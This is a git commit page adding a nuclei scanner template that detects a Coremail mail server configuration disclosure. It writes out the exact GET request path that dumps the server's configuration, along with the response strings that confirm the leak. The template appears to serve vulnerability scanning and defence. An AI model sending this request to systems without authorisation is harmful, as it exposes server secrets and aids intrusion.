Merge pull request #1216 from projectdiscovery/princechaddha-patch-4
Create coremail-config-disclosure.yamlpatch-1
commit
00a5fae317
|
@ -0,0 +1,27 @@
|
|||
id: coremail-config-disclosure
|
||||
|
||||
info:
|
||||
name: Coremail Config Disclosure
|
||||
author: princechaddha
|
||||
severity: high
|
||||
reference: https://www.secpulse.com/archives/107611.html
|
||||
tags: config,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/mailsms/s?func=ADMIN:appState&dumpConfig=/'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<object name=\"cm_md_db\">"
|
||||
- 'containerDefinitions'
|
||||
- '<string name="User">coremail</string>'
|
||||
- '<string name="EnableCoremailSmtp">'
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue